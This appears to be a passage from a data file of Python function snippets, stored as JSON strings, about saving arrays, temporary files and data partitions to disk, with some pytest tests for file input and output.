subarray.\n logger.partitioning(\" 1.1.1.1 revert\")\n self.revert()\n elif free_memory() <= cf_fm_threshold():\n # 1.1.1.2 The original subarray was on disk,\n # we are happy to keep the current\n # subarray in memory, but there is not\n # enough free memory to do so.\n logger.partitioning(\n \" 1.1.1.2 revert ({} <= {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n self.revert()\n else:\n # 1.1.1.3 The original subarray was on disk\n # and there is enough memory to keep\n # the current subarray in memory\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # The original subarray was a temporary\n # file which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n del self.masked\n logger.partitioning(\n \" 1.1.1.3 del masked ({} > {})\".format(\n free_memory(), cf_fm_threshold()\n )\n )\n\n else:\n logger.partitioning(\" subarray originally in memory\")\n if config.get(\"to_disk\", False):\n # 1.1.2.1 Original subarray was in memory and\n # we don't want to keep the current\n # subarray in memory\n logger.partitioning(\" 1.1.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.1.2.2 Original subarray was in memory and\n # unique but there is not enough\n # memory to keep the current subarray\n logger.partitioning(\" 1.1.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.1.2.3 Original subarray was in memory and\n # unique and there is enough memory to\n # keep the current subarray in memory\n logger.partitioning(\" 1.1.2.3 pass\")\n pass\n else:\n # config['readonly'] is False\n if originally_on_disk:\n if config.get(\"to_disk\", False):\n # 1.2.1.1 Original subarray was on disk and\n # there and we don't want to keep the\n # array\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.1.2 Original subarray was on disk but\n # there is not enough memory to keep\n # it\n if config[\"unique_subarray\"] and isinstance(\n original_subarray, CachedArray\n ):\n # Original subarray was a temporary file\n # on disk which is not referenced by 
any\n # other partitions\n _remove_temporary_files(\n original_subarray._partition_file\n )\n\n logger.partitioning(\" 1.2.1.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.1.3 Original subarray was on disk and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.1.3 pass\")\n del self.masked\n else:\n if config.get(\"to_disk\", False):\n # 1.2.2.1 Original subarray was in memory but\n # we don't want to keep it\n logger.partitioning(\" 1.2.2.1 to_disk\")\n self.to_disk(reopen=False)\n elif free_memory() <= cf_fm_threshold():\n # 1.2.2.2 Original subarray was an in memory\n # but there is not enough memory to\n # keep it\n logger.partitioning(\" 1.2.2.2 to_disk\")\n self.to_disk(reopen=False)\n else:\n # 1.2.2.3 Original subarray was in memory and\n # there is enough memory to keep it\n logger.partitioning(\" 1.2.2.3 del masked\")\n del self.masked\n else:\n logger.partitioning(\"Partition.close: parallel\")\n # --------------------------------------------------------\n # PARALLEL\n # --------------------------------------------------------\n pass\n\n # if hasattr(self, '_original'):\n # del self._original\n\n # print(hasattr(self, 'config')),\n try:\n del self.config\n except AttributeError:\n pass",
"def cleanup(job, tempOutputFileStoreID, outputFile, cores=1, memory=sortMemory, disk=\"3G\"):\n fileName = job.fileStore.readGlobalFile(tempOutputFileStoreID)\n shutil.copyfile(fileName, outputFile)\n job.fileStore.logToMaster(\"Finished copying sorted file to output: %s\" % outputFile)",
"def _register_temporary_file(self):\n _partition_file = self._subarray._partition_file\n _partition_dir = self._subarray._partition_dir\n if _partition_file not in _temporary_files:\n fd, _lock_file = mkstemp(\n prefix=_partition_file + \"_\", dir=_partition_dir\n )\n close(fd)\n _temporary_files[_partition_file] = (\n _partition_dir,\n _lock_file,\n set(),\n )\n else:\n _, _lock_file, _ = _temporary_files[_partition_file]\n\n return _lock_file",
"def save_partition(self, partition):\n raise NotImplementedError('save_file')",
"def _write_array_on_file(self, pa_array):\n pa_batch = pa.RecordBatch.from_struct_array(pa_array)\n self._num_bytes += pa_array.nbytes\n self.pa_writer.write_batch(pa_batch)",
"def quick_save_array(data, file_name, delimiter=',', ):\n data.tofile(file_name, sep=delimiter)",
"def save_tmp_file(self, data):\n with open(self.tmp_file, 'wb') as f:\n f.write(data)",
"def move_from_temp_directory(self):",
"def test_deleting_local_file_using_file_io_output_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n # Write to the temporary file\n file_location = os.path.join(tmpdirname, \"foo.txt\")\n with open(file_location, \"wb\") as f:\n f.write(b\"foo\")\n\n # Instantiate the file-io\n file_io = PyArrowFileIO()\n\n # Confirm that the file initially exists\n assert os.path.exists(file_location)\n\n # Instantiate the custom OutputFile\n output_file = PyArrowFileIO().new_output(location=f\"{file_location}\")\n\n # Delete the file using the file-io implementations delete method\n file_io.delete(output_file)\n\n # Confirm that the file no longer exists\n assert not os.path.exists(file_location)",
"def test_deleting_local_file_using_file_io() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n # Write to the temporary file\n output_file_location = os.path.join(tmpdirname, \"foo.txt\")\n with open(output_file_location, \"wb\") as f:\n f.write(b\"foo\")\n\n # Instantiate the file-io\n file_io = PyArrowFileIO()\n\n # Confirm that the file initially exists\n assert os.path.exists(output_file_location)\n\n # Delete the file using the file-io implementations delete method\n file_io.delete(output_file_location)\n\n # Confirm that the file no longer exists\n assert not os.path.exists(output_file_location)",
"def write_prep_arr(self, arr, index=None):\n if index is None:\n prep_data_dir = os.path.join(self.experiment_dir, 'prep')\n else:\n prep_data_dir = os.path.join(self.experiment_dir, *('scan_' + str(index), 'prep'))\n data_file = os.path.join(prep_data_dir, 'prep_data.tif')\n if not os.path.exists(prep_data_dir):\n os.makedirs(prep_data_dir)\n arr = self.detector.clear_seam(arr, self.roi)\n ut.save_tif(arr, data_file)",
"def test_save_npy(temp_dir):\n data = np.array([[1, 2, 3], [4, 5, 6]])\n save_npy(temp_dir, data, step=1)\n\n assert os.path.exists(os.path.join(temp_dir, \"npy\", \"1.npy\"))",
"def test_to_file(self):\n with TemporaryDirectory() as tmp:\n df_test = make_simple_dataframe()\n Base = BaseDataClass.from_object(df_test)\n fp_save = os.path.join(tmp, \"test_save.csv\")\n Base.to_file(fp_save)\n assert os.path.exists(fp_save)",
"def ArraytoFile(_array):\n\tfile = open('sort1.txt', 'w')\n\tfor line in _array:\n\t\tfile.write(line+\"\\n\")\n\tfile.close()",
"def write_to_disk(self):\n\n\t\t# print \"--------------------------------------------------------WRITING PIECE %r TO DISK\" %self.index\n\t\ttry:\n\t\t\tos.makedirs(PATH)\n\t\texcept:\n\t\t\tpass\n\t\tself.piece_file_name = os.path.join(PATH, self.torrent.name+'.'+'00'+str(self.index))\n\t\t# print \"Saving piece to file name: \", self.piece_file_name\n\t\tpiece_file = open(self.piece_file_name, 'w')\n\t\tpiece_file.write(self.data)\n\t\tpiece_file.close()",
"def write_part_to_file(self, uid, part):\n filename = part.get_filename()\n filename = os.path.join(self.tmp_dir, os.path.basename(filename))\n try:\n open(filename, 'wb').write(part.get_payload(decode=True))\n except Exception as e:\n raise Exception(\n \"Error writing to filename %s with exception %s\" %\n (filename, str(e)))\n else:\n self.helper.log_debug(\n 'write_part_to_file: saved file %s from uid %s' %\n (filename, uid))\n return filename",
"def toFile(self,fid):\n stack = []\n for w,b in self.stack:\n w.copy_to_host()\n b.copy_to_host()\n stack.append([w.numpy_array,b.numpy_array])\n\tpickle.dump(stack,fid)",
"def write_to_outfile(involume, outvolume, data, outfiles_partition, outdir_path, O, file_manager, addition, tracker):\n lowcorner, upcorner = get_overlap_subarray(involume, outvolume) # find subarray crossing both files in the basis of the original image\n overlap_vol = get_overlap_volume(involume, outvolume)\n overlap_shape = overlap_vol.get_shape()\n if DONT_WRITE:\n tracker.add_volume(overlap_vol)\n\n nb_outfile_seeks_tmp = 0\n s = overlap_shape\n if s[2] != O[2]:\n nb_outfile_seeks_tmp += s[0]*s[1]\n elif s[1] != O[1]:\n nb_outfile_seeks_tmp += s[0]\n elif s[0] != O[0]:\n nb_outfile_seeks_tmp += 1\n else:\n pass\n\n if DONT_WRITE:\n print(f\"Overlap shape: {overlap_shape}\")\n print(f\"Outfile shape: {O}\")\n print(f\"Number seeks: {nb_outfile_seeks_tmp}\")\n return overlap_shape, 0, nb_outfile_seeks_tmp\n\n slices = [(lowcorner[0], upcorner[0]), (lowcorner[1], upcorner[1]), (lowcorner[2], upcorner[2])]\n offset_in = involume.get_corners()[0] # lower corner\n offset_out = outvolume.get_corners()[0]\n\n slices_in_infile = [ # convert corners in the basis of input file\n (lowcorner[0]-offset_in[0], upcorner[0]-offset_in[0]), \n (lowcorner[1]-offset_in[1], upcorner[1]-offset_in[1]), \n (lowcorner[2]-offset_in[2], upcorner[2]-offset_in[2])]\n \n slices_in_outfile = [ # convert corners in the basis of output file\n (lowcorner[0]-offset_out[0], upcorner[0]-offset_out[0]), \n (lowcorner[1]-offset_out[1], upcorner[1]-offset_out[1]), \n (lowcorner[2]-offset_out[2], upcorner[2]-offset_out[2])]\n\n if DEBUG_LOCAL:\n logger.debug(f\"[debug] extracting {s[0][0]}:{s[0][1]}, {s[1][0]}:{s[1][1]}, {s[2][0]}:{s[2][1]} from input file\")\n logger.debug(f\"[debug] inserting {s2[0][0]}:{s2[0][1]}, {s2[1][0]}:{s2[1][1]}, {s2[2][0]}:{s2[2][1]} into output file {out_filename}\")\n\n s = slices_in_infile\n subarr_data = data[s[0][0]:s[0][1],s[1][0]:s[1][1],s[2][0]:s[2][1]] # extract subarr from input file's data \n\n _3d_pos = numeric_to_3d_pos(outvolume.index, outfiles_partition, order='C')\n i, j, k = _3d_pos\n\n if addition:\n subarr_data = subarr_data + 1\n\n global outdirs_dict, outdir_index\n\n if (i, j, k) in outdirs_dict.keys():\n outdir_path = outdirs_dict[(i, j, k)]\n print(f\"Writing at: {outdir_path}\")\n else:\n outdir_path = '/disk' + str(outdir_index) + '/gtimothee/output'\n outdirs_dict[(i, j, k)] = outdir_path\n outdir_index += 1\n if outdir_index == 6:\n outdir_index = 0\n\n print(f\"Writing at: {outdir_path}\")\n print(f\"Increasing writing index: {outdir_index}\")\n\n t2 = time.time()\n if not DONT_WRITE:\n file_manager.write_data(i, j, k, outdir_path, subarr_data, slices_in_outfile, O)\n t2 = time.time() - t2\n \n if DEBUG_LOCAL: \n file_manager.test_write(outfile_path, slices_in_outfile, subarr_data)\n\n return overlap_shape, t2, nb_outfile_seeks_tmp",
"def save_data_to_disk(self):\n Omega_M = self.theta_fid[0]\n for key in self.data.keys():\n np.save(f'./preloaded_data/{Omega_M}_{self.delta_theta[0]}_{key}.npy', self.data[key])",
"def save(self):\n if self.hasChanged:\n filePath = self.path\n tempPath = filePath+'.tmp'\n fileDir = os.path.split(filePath)[0]\n if not os.path.exists(fileDir): os.makedirs(fileDir)\n cPickle.dump(self.data,open(tempPath,'w'))\n renameFile(tempPath,filePath,True)\n self.hasChanged = False",
"def temp_split(filename):\n filename, ext = filename.rsplit('.')\n data = np.load(filename + \".\" + ext)\n # define basic constants from parent\n A = data['a']\n A_SIZE = A.shape[0]\n A_SHAPE = A.shape\n ORIGINAL_SIZE = data['original_size']\n B = data['b']\n # basics\n ki, kj, m = np.sum(A, 1), np.sum(A, 0), np.sum(np.sum(A, 1))\n # eval & evec\n eval, evec = linalg.eigh(B)\n # split\n g1_order, g1_arrays, g2_order, g2_arrays = create_g(A, evec)\n g1, g2 = create_g_matrix(g1_order, g1_arrays), create_g_matrix(g2_order, g2_arrays)\n # threshold (q)\n q1 = create_q(A_SIZE, B, g1_order, m)\n q2 = create_q(A_SIZE, B, g2_order, m)\n # B of G\n b1 = create_b_of_g(B, g1_order)\n b2 = create_b_of_g(B, g2_order)\n # a_elems\n a1_elems = []\n a2_elems = []\n original_elems = data['a_elems']\n for i in g1_order:\n a1_elems.append(original_elems[i])\n for i in g2_order:\n a2_elems.append(original_elems[i])\n return Part(filename + ',1', ext, q1, g1.shape[0], ','.join([str(x) for x in a1_elems])), \\\n Part(filename + ',2', ext, q2, g2.shape[0], ','.join([str(x) for x in a2_elems]))",
"def update_flat_file(array, flat_file):\n\n logger.info('Updating filespace flat files') \n\n pg_system_fs_entries = GetFilespaceEntriesDict(GetFilespaceEntries(array, PG_SYSTEM_FILESPACE).run()).run() \n \n flat_file_location = os.path.join(pg_system_fs_entries[1][2], flat_file) \n \n if not os.path.exists(flat_file_location):\n return\n\n logger.debug('flat file location for transaction files = %s' % flat_file_location)\n #Copy over the updated flat file to the standby\n with open(flat_file_location) as read_file:\n lines_to_write = ''\n for line in read_file:\n tokens = line.split()\n if len(tokens) != 2:\n lines_to_write += line\n elif tokens[0] == '1':\n lines_to_write += line\n\n temp_flat_file = os.path.join(flat_file_location + '.tmp')\n \n try:\n with open(temp_flat_file, 'w') as write_file:\n write_file.write(lines_to_write)\n \n #Rewrite the master flat file to include the standby information \n shutil.move(temp_flat_file, flat_file_location)\n except Exception, e:\n raise Exception('Failed to update flat file')",
"def writePosFilesStep(self): \n \n writeSetOfCoordinates(self._getExtraPath(), self.inputCoordinatesTiltedPairs.get().getUntilted())\n \n writeSetOfCoordinates(self._getExtraPath(), self.inputCoordinatesTiltedPairs.get().getTilted())",
"def rotate_file(cls, main_dir, temp_dir):\n\t\tif(os.path.isfile(main_dir)):\n\t\t\tos.remove(main_dir)\n\t\tcopyfile(temp_dir, main_dir)\n\t\tos.remove(temp_dir)",
"def save_data(self, f): \n if not self.sampling:\n self.convert_to_array()\n np.save(f, self.reads)",
"def dump(self, step=None):\n if self._compressed:\n np.savez_compressed(self._file_path, **self._data)\n else:\n np.savez(self._file_path, **self._data)",
"def __del__(self):\n # subarray = getattr(self, '_subarray', None)\n subarray = self._subarray\n\n # If the subarray is unique it will have 2 references to\n # it plus 1 within this method, making 3. If it has more\n # than 3 references to it then it is not unique.\n if getrefcount is not None:\n self._decrement_file_counter()\n if subarray is None or getrefcount(subarray) > 3:\n return\n else:\n # getrefcount has itself been deleted or is in the process\n # of being torn down\n return\n\n _partition_file = getattr(subarray, \"_partition_file\", None)\n if _partition_file is not None:\n # This partition contains a temporary file which is not\n # referenced by any other partition on this process, so if\n # there are no lock files present remove the file from\n # disk.\n _remove_temporary_files(_partition_file)\n\n else:\n try:\n if FileArray is not None and isinstance(subarray, FileArray):\n try:\n filename = subarray.get_filename()\n except Exception:\n filename = None\n\n if self.file_counter.get(filename, 999) <= 0:\n # This partition contains a non-temporary file\n # which is not referenced by any other\n # partitions, so close the file.\n subarray.close()\n except Exception:\n # If we're here then it is likely that FileArray has been\n # torn down, so just do nothing.\n pass\n # --- End: if",
"def dump_trjqueue(self,replica):\n\t\n\t# write coords and enes to the workspace, by_temp and by_replica\n rep = replica.repnum\n\t\n\t### WORKSPACE FILES ###\n\tfor pt in range(0,len(self.trjqueue[rep])):\n\n\t self.repfiles_trj[rep].write(repr(self.trjqueue[rep][pt]))\n\t self.repfiles_trj[rep].write('\\n')\n\n\t### BY_TEMP and BY_REPLICA FILES ###\n realrep = replica.mc.tempfromrep\n\t\n\tself.byreplica_temp[rep].write(str(rep))\n\tself.byreplica_temp[rep].write('\\n')\n\n\tself.bytemp_replica[rep].write(str(realrep))\n\tself.bytemp_replica[rep].write('\\n')\n\n\tfor pt in range(0,len(self.trjqueue[realrep])):\n\t self.bytemp_trj[rep].write(repr(self.trjqueue[realrep][pt]))\n\t self.bytemp_trj[rep].write('\\n')\n\n\tfor pt in range(0,len(self.trjqueue[rep])):\n\t self.byreplica_trj[rep].write(repr(self.trjqueue[rep][pt]))\n\t self.byreplica_trj[rep].write('\\n')\n\n ### clear the trj and ene queues\n self.trjqueue[rep] = []",
"def take_snapshot(self):\r\n self.snapshot = self.name, self.size, copy.copy(self.cells)\r\n self.bucket_array.take_snapshot()",
"def save_array(array, filename):\n np.save(filename, array)",
"def save_numpy_array(self):\n np.save(\"smallest_particles.npy\", self.smallest_particles)\n np.save(\"number_counts.npy\", self.number_counts)\n np.save(\"number_counts_2.npy\", self.number_counts_2)",
"def delete_piece_files(self):\n\n\t\tprint \"Removing piece files and cleaning up...\"\n\t\tpieces_dir = os.path.join(PATH, 'Pieces')\n\t\ttry:\n\t\t\tos.makedirs(pieces_dir)\n\t\texcept:\n\t\t\tpass\n\t\tfor i in range(self.torrent.no_of_subpieces):\n\t\t\tpiece_src = os.path.join(PATH, self.torrent.name+'.'+'00'+str(i))\n\t\t\tpiece_dest = os.path.join(pieces_dir, self.torrent.name+'.'+'00'+str(i))\n\t\t\tshutil.move(piece_src, piece_dest)\n\t\t\t# Or I just delete them:\n\t\t\t# os.remove(piece_src)",
"def save_subpath(self, index, result_path='', subPath=''):\n pass",
"def saveto(file, tmpfile):\n args = {\"file\": file, \"tmpfile\": tmpfile}\n send_command(\"saveto\", args)",
"def write_sorting(sorting, save_path):\n assert HAVE_SBEX, SHYBRIDSortingExtractor.installation_mesg\n dump = np.empty((0, 2))\n\n for unit_id in sorting.get_unit_ids():\n spikes = sorting.get_unit_spike_train(unit_id)[:, np.newaxis]\n expanded_id = (np.ones(spikes.size) * unit_id)[:, np.newaxis]\n tmp_concat = np.concatenate((expanded_id, spikes), axis=1)\n\n dump = np.concatenate((dump, tmp_concat), axis=0)\n\n sorting_fn = os.path.join(save_path, 'initial_sorting.csv')\n np.savetxt(sorting_fn, dump, delimiter=',', fmt='%i')",
"def join_chunks(self):\n if self.state == self.STATE_UPLOADING and self.total_chunks_uploaded == self.total_chunks:\n\n # create file and write chunks in the right order\n temp_file = open(self.full_path, \"wb\")\n for chunk in self.chunks.all():\n chunk_bytes = chunk.file.read()\n temp_file.write(chunk_bytes)\n temp_file.close()\n\n # set state as completed\n self.state = self.STATE_COMPLETED\n super(FlowFile, self).save()\n\n # delete chunks automatically if is activated in settings\n if FLOWJS_AUTO_DELETE_CHUNKS:\n self.chunks.all().delete()",
"def delete_partition(self, partition):\n raise NotImplementedError('delete_file')",
"def single_file_write(self, file_pointer, filename):\n temp_file = \"resources/temp_file\"\n\n file_pointer.seek(0)\n with open(temp_file, \"wb\") as output_file:\n shutil.copyfileobj(file_pointer, output_file)\n\n os.rename(temp_file, filename)\n log.info(\"Saved file: %s\", filename)",
"def set_temp_file(self):\n\n index = self.filename.rfind('/') + 1\n self.temp_filename = self.filename[:index] + \"tmp_\" + self.filename[index:]",
"def save_to_array(arr_name, arr_object):\n return np.save(arr_name, arr_object)",
"def write_csv_file(array, filename):\n\tnp.savetxt(filename, array, delimiter=\",\")",
"def file_close(self):\n if self.on_disk:\n self._subarray.close()",
"def write_subscriptions_to_tmp(self, subscriptions):\n with open(SUBSCRIPTIONS_FP, 'w') as data_file:\n json.dump(subscriptions, data_file, cls=EventerJSONEncoder)",
"def pytorch_save_atomic(data, filepath):\n\tfilepath = Path(filepath)\n\tfilepath_tmp = filepath.with_suffix('.tmp')\n\ttorch.save(data, filepath_tmp)\n\tshutil.move(filepath_tmp, filepath)",
"def split_data(raw_data, output_pref):\n train_data = output_pref + \".train\"\n test_data = output_pref + \".test\"\n random.shuffle(raw_data)\n with open(train_data, \"w\", encoding=\"utf8\") as fw1:\n with open(test_data, \"w\", encoding=\"utf8\") as fw2:\n with open(train_data + \".raw\", \"w\", encoding=\"utf8\") as fw3:\n with open(test_data + \".raw\", \"w\", encoding=\"utf8\") as fw4:\n for idx, (line, item) in enumerate(raw_data):\n if idx < 1000:\n fw2.write(line + \"\\n\")\n fw4.write(\"\\t\".join([str(i) for i in item]) + \"\\n\")\n else:\n fw1.write(line + \"\\n\")\n fw3.write(\"\\t\".join([str(i) for i in item]) + \"\\n\")",
"def _write_intermediate_results(storm_object_table, temp_file_name):\n\n file_system_utils.mkdir_recursive_if_necessary(file_name=temp_file_name)\n\n pickle_file_handle = open(temp_file_name, 'wb')\n pickle.dump(storm_object_table[INTERMEDIATE_COLUMNS], pickle_file_handle)\n pickle_file_handle.close()",
"def down(job, inputFileStoreID, N, downCheckpoints, memory=sortMemory):\n #Read the file\n inputFile = job.fileStore.readGlobalFile(inputFileStoreID, cache=False)\n length = os.path.getsize(inputFile)\n if length > N:\n #We will subdivide the file\n job.fileStore.logToMaster( \"Splitting file: %s of size: %s\"\n % (inputFileStoreID, length), level=logging.CRITICAL )\n #Split the file into two copies\n midPoint = getMidPoint(inputFile, 0, length)\n t1 = job.fileStore.getLocalTempFile()\n with open(t1, 'w') as fH:\n copySubRangeOfFile(inputFile, 0, midPoint+1, fH)\n t2 = job.fileStore.getLocalTempFile()\n with open(t2, 'w') as fH:\n copySubRangeOfFile(inputFile, midPoint+1, length, fH)\n #Call down recursively\n return job.addFollowOnJobFn(up,\n job.addChildJobFn(down, job.fileStore.writeGlobalFile(t1), N, \n downCheckpoints, checkpoint=downCheckpoints, memory=sortMemory).rv(),\n job.addChildJobFn(down, job.fileStore.writeGlobalFile(t2), N, \n downCheckpoints, checkpoint=downCheckpoints, memory=sortMemory).rv()).rv() \n else:\n #We can sort this bit of the file\n job.fileStore.logToMaster( \"Sorting file: %s of size: %s\"\n % (inputFileStoreID, length), level=logging.CRITICAL )\n #Sort the copy and write back to the fileStore\n shutil.copyfile(inputFile, inputFile + '.sort')\n sort(inputFile + '.sort')\n return job.fileStore.writeGlobalFile(inputFile + '.sort')",
"def test_custom_local_output_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n file_location = os.path.join(tmpdirname, \"foo.txt\")\n\n # Instantiate the output file\n absolute_file_location = os.path.abspath(file_location)\n output_file = PyArrowFileIO().new_output(location=f\"{absolute_file_location}\")\n\n # Create the output file and write to it\n f = output_file.create()\n f.write(b\"foo\")\n\n # Confirm that bytes were written\n with open(file_location, \"rb\") as f:\n assert f.read() == b\"foo\"\n\n assert len(output_file) == 3",
"def eeg_writeavr(array,tsb,di,file):\t\t\n import shutil as shu\n f=open(file,'w')\n firstline = 'Npts= %i TSB= %i DI= %7.5f SB= %7.5f SC= %i NChan= %i\\n' %(array.shape[1],tsb,di,1,200,array.shape[0]) \n chnam = 'Cz FP1 FP2 F3 F4 C3 C4 P3 P4 O1 O2 F7 F8 T7 T8 P7 P8 Fz Pz FC1 FC2 CP1 CP2 FC5 FC6 CP5 CP6 FT9 FT10 TP9 TP10 PO9 PO10\\n'\n f.write(firstline)\n f.write(chnam)\n for i in range(array.shape[0]):\n tmp = array[i,:]\n f.write(('%7.5f ' * len(tmp)) %tuple(tmp))\n f.write('\\n')\n \n f.close()\n #may want to change this on different machines...\n src = '/Users/crislanting/Projects/EEG/data/33.elp'\n dest = file[:-4] + '.elp'\n shu.copyfile(src,dest)",
"def _copy(self):\n for d in self._current_chunk:\n self.out.write(d)",
"def _flush_write_buffer(self):\n if self._buffer_file_size:\n self._write_counter += 1\n self.file.seek(0)\n self._multipart.upload_part_from_file(\n self.file,\n self._write_counter,\n headers=self._storage.headers\n )\n self.file.close()\n self.file = None",
"def moveNewFragmentsToTmpDir(options,nextTaskNum):\n for i in range(1,nextTaskNum):\n frag = getFragmentPath(options.tmpDir, options.fragBase, i)\n newfrag = getFragmentPath(\"%s%stmp\" % (options.tmpDir, os.sep), options.fragBase, i)\n os.rename(newfrag,frag)\n os.rmdir(\"%s%stmp\" % (options.tmpDir, os.sep))",
"def save(self, filename):\n np.savez(temp_dir + '/' + filename + '.npz', chip_ids=self.chip_ids, core_ids=self.core_ids, cx_ids=self.cx_ids)",
"def save_elem_file(self, output):\n with open(output, 'wb') as fid:\n self._write_elem_header(fid)\n self._write_nodes(fid)\n self._write_elements(fid)\n self._write_neighbors(fid)",
"def write_temp_file_to_path(suffix, content, file_path):\n temp_file = NamedTemporaryFile(suffix=suffix)\n temp_file.write(content)\n temp_file.seek(0)\n export_filename = default_storage.save(file_path, File(temp_file, file_path))\n temp_file.close()\n\n return export_filename",
"def test_output_file_to_input_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n output_file_location = os.path.join(tmpdirname, \"foo.txt\")\n\n # Create an output file instance\n output_file = PyArrowFileIO().new_output(location=f\"{output_file_location}\")\n\n # Create the output file and write to it\n with output_file.create() as output_stream:\n output_stream.write(b\"foo\")\n\n # Convert to an input file and confirm the contents\n input_file = output_file.to_input_file()\n with input_file.open() as f:\n assert f.read() == b\"foo\"",
"def print_to_file(arr, fid, sep=\"\", format=\"%s\"):\n\n f = array_create.array(arr, bohrium=False)\n return f.tofile(fid, sep=sep, format=format)",
"def _clear_temp_results(self):\n with open(self._filename, \"w\") as f_out:\n f_out.write(self._delimiter.join(self._get_fields()))\n f_out.write(\"\\n\")",
"def createTempoArray():\r\n file2write.write(\"int tempi[] = {\")\r\n\r\n for t in tempi: #iterates through tempi-array and filles the array with elements\r\n if t > 40:\r\n file2write.write(str(t))\r\n file2write.write(\",\")\r\n file2write.write(\"};\\n\\n\")",
"def array2chomp( arr, savename ):\n rows = map( lambda x: str(x)+'\\n', map( tuple, iter( arr ) ) ) \n with open( savename, 'w' ) as fh:\n fh.writelines( rows )",
"def save(self, filename):\n np.savez(temp_dir + '/' + filename + '.npz', core_ids=self.core_ids, cx_ids=self.cx_ids)",
"def adapt_array(self,array):\n import io\n import array,numpy\n out = io.BytesIO()\n numpy.save(out, array)\n out.seek(0)\n \n return out.read()",
"def _save_to_file(filename, data, start=0, header_size=None):\n if header_size is None:\n header_size = 0\n item_dtype = data.dtype\n # Open file as necessary\n opened = False\n if isinstance(filename, str):\n fd = open(filename, 'rb+')\n opened = True\n else:\n fd = filename\n # Seek to halo location and write\n offset = header_size + (start * item_dtype.itemsize)\n fd.seek(offset, os.SEEK_SET)\n data.tofile(fd)\n if opened:\n fd.close()",
"def test_deleting_local_file_using_file_io_input_file() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n # Write to the temporary file\n file_location = os.path.join(tmpdirname, \"foo.txt\")\n with open(file_location, \"wb\") as f:\n f.write(b\"foo\")\n\n # Instantiate the file-io\n file_io = PyArrowFileIO()\n\n # Confirm that the file initially exists\n assert os.path.exists(file_location)\n\n # Instantiate the custom InputFile\n input_file = PyArrowFileIO().new_input(location=f\"{file_location}\")\n\n # Delete the file using the file-io implementations delete method\n file_io.delete(input_file)\n\n # Confirm that the file no longer exists\n assert not os.path.exists(file_location)",
"def _create_temp_batch_file(self):\n return tempfile.NamedTemporaryFile(delete=False)",
"def write_files(self, basedir):\n outdir = basedir / self.type\n outdir.mkdir(parents=True, exist_ok=True)\n\n for point, row in zip(self.points, self.array):\n filepath = outdir / point\n with filepath.open('w') as f:\n idx = 0\n for ikey in self.pardict.keys():\n f.write(\"{} {}\\n\".format(ikey, row[idx]))\n idx += 1\n logging.debug('wrote %s', filepath)",
"def test_write_element(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dt = np.dtype('(3,)f8')\n dset = f.create_dataset('x', (10,), dtype=dt)\n\n data = np.array([1, 2, 3.0])\n dset[4] = data\n\n out = dset[4]\n assert np.all(out == data)",
"def SavePartition(filepath, partition, sep=' '):\n def _com_to_string(com):\n \"\"\" helper function to string format node weights \"\"\"\n return sep.join([str(x) for x in com])\n\n # joining lines with line-breaks\n text = '\\n'.join([_com_to_string(com) for com in partition])\n\n # writing formatted matrix to file\n with open(filepath, 'w') as outfile:\n outfile.write(text)",
"def save(self, path_to_save):\n for item in self.data_array:\n item.save(path_to_save+item.file_name)",
"def write_table(self, df):\n (part_names, grouped_df, part_offsets,) = _get_groups_and_offsets(\n df=df,\n partition_cols=self.partition_cols,\n preserve_index=self.common_args[\"index\"],\n )\n fs = ioutils._ensure_filesystem(None, self.path, None)\n fs.mkdirs(self.path, exist_ok=True)\n\n full_paths = []\n metadata_file_paths = []\n full_offsets = [0]\n\n for idx, keys in enumerate(part_names.itertuples(index=False)):\n subdir = fs.sep.join(\n [\n f\"{name}={val}\"\n for name, val in zip(self.partition_cols, keys)\n ]\n )\n prefix = fs.sep.join([self.path, subdir])\n fs.mkdirs(prefix, exist_ok=True)\n current_offset = (part_offsets[idx], part_offsets[idx + 1])\n num_chunks = 1\n parts = 1\n\n if self.max_file_size is not None:\n # get the current partition\n start, end = current_offset\n sliced_df = grouped_df[start:end]\n\n current_file_size = _get_estimated_file_size(sliced_df)\n if current_file_size > self.max_file_size:\n # if the file is too large, compute metadata for\n # smaller chunks\n parts = math.ceil(current_file_size / self.max_file_size)\n new_offsets = list(\n range(start, end, int((end - start) / parts))\n )[1:]\n new_offsets.append(end)\n num_chunks = len(new_offsets)\n parts = len(new_offsets)\n full_offsets.extend(new_offsets)\n else:\n full_offsets.append(end)\n\n curr_file_num = 0\n num_chunks = 0\n while num_chunks < parts:\n new_file_name = f\"{self.filename}_{curr_file_num}.parquet\"\n new_full_path = fs.sep.join([prefix, new_file_name])\n\n # Check if the same `new_file_name` exists and\n # generate a `new_file_name`\n while new_full_path in self._file_sizes and (\n self._file_sizes[new_full_path]\n + (current_file_size / parts)\n ) > (self.max_file_size):\n curr_file_num += 1\n new_file_name = (\n f\"{self.filename}_{curr_file_num}.parquet\"\n )\n new_full_path = fs.sep.join([prefix, new_file_name])\n\n self._file_sizes[new_full_path] = self._file_sizes.get(\n new_full_path, 0\n ) + (current_file_size / parts)\n full_paths.append(new_full_path)\n metadata_file_paths.append(\n fs.sep.join([subdir, new_file_name])\n )\n num_chunks += 1\n curr_file_num += 1\n else:\n self.filename = self.filename or _generate_filename()\n full_path = fs.sep.join([prefix, self.filename])\n full_paths.append(full_path)\n metadata_file_paths.append(\n fs.sep.join([subdir, self.filename])\n )\n full_offsets.append(current_offset[1])\n\n paths, metadata_file_paths, offsets = (\n full_paths,\n metadata_file_paths,\n full_offsets,\n )\n existing_cw_batch = defaultdict(dict)\n new_cw_paths = []\n partition_info = [(i, j - 